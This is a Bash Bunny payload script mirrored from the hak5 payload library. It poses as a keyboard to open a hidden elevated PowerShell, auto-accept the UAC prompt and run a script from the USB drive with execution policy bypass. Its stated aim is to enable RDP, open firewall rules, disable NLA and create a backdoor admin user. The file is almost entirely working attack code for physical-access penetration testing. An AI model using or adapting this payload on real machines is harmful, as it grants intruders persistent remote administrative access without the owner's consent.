hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
bashbunny-payloads/payloads/library/remote_access/RDP-Enable/payload.txt

38 lines
985 B
Plaintext
Raw Blame History

############################################################################################
# Purpose: Enable RDP, fw rules and admin user. Disable NLA. Create admin user just in case.
# Version: 1.0
# Author: Mike Galvin
# Contact: mike@gal.vin or twitter.com/mikegalvin_
# Date: 2019-10-08
#############################################################################################
#!/bin/bash
# Options
LOOTDIR=/root/udisk/loot/badmin
######## INITIALIZATION ########
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
######## MAKE LOOT DIRECTORY ########
mkdir -p $LOOTDIR
######## ATTACK ########
LED ATTACK
RUN WIN "powershell -windowstyle hidden start-process powershell -verb RunAs"
sleep 3
Q ALT Y
sleep 2
Q STRING "\$src = (gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\p.ps1'"
Q ENTER
sleep 1
QUACK STRING "powershell -ep bypass \$src"
Q ENTER
Q STRING "exit"
Q ENTER
######## FINISH ########
LED FINISH
Reference in New Issue View Git Blame Copy Permalink